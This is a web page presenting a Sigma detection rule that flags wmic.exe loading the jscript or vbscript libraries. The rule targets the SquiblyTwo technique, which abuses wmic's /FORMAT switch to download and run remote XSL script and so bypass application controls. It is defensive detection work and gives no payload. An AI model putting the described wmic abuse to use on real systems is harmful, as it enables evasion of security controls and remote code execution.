WMIC Loading Scripting Libraries

calendar Jan 24, 2026 · attack.defense-evasion attack.t1220  ·
Share on: linkedin copy

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e js, vbs, etc). It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.

Sigma rule (View on GitHub)

 1title: WMIC Loading Scripting Libraries
 2id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32
 3related:
 4    - id: 8d63dadf-b91b-4187-87b6-34a1114577ea
 5      type: similar
 6    - id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d
 7      type: similar
 8status: test
 9description: |
10    Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
11    It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.    
12references:
13    - https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html
14    - https://twitter.com/dez_/status/986614411711442944
15    - https://lolbas-project.github.io/lolbas/Binaries/Wmic/
16author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
17date: 2020-10-17
18modified: 2022-10-13
19tags:
20    - attack.defense-evasion
21    - attack.t1220
22logsource:
23    category: image_load
24    product: windows
25detection:
26    selection:
27        Image|endswith: '\wmic.exe'
28        ImageLoaded|endswith:
29            - '\jscript.dll'
30            - '\vbscript.dll'
31    condition: selection
32falsepositives:
33    - The command wmic os get lastbootuptime loads vbscript.dll
34    - The command wmic os get locale loads vbscript.dll
35    - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
36    - The command `wmic ntevent` loads vbscript.dll
37level: medium

References

  • WMIC Remote XSL Jscript Execution — Security Datasets

    Dataset Description# This dataset represents adversaries proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL fi...


    Read More

  • Something went wrong, but don’t fret — let’s give it another shot. Some privacy related extensions may cause issues on x.com. Please disable them and try again.


    Read More

  • Wmic on LOLBAS

    Wmic.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.


    Read More

Related rules

to-top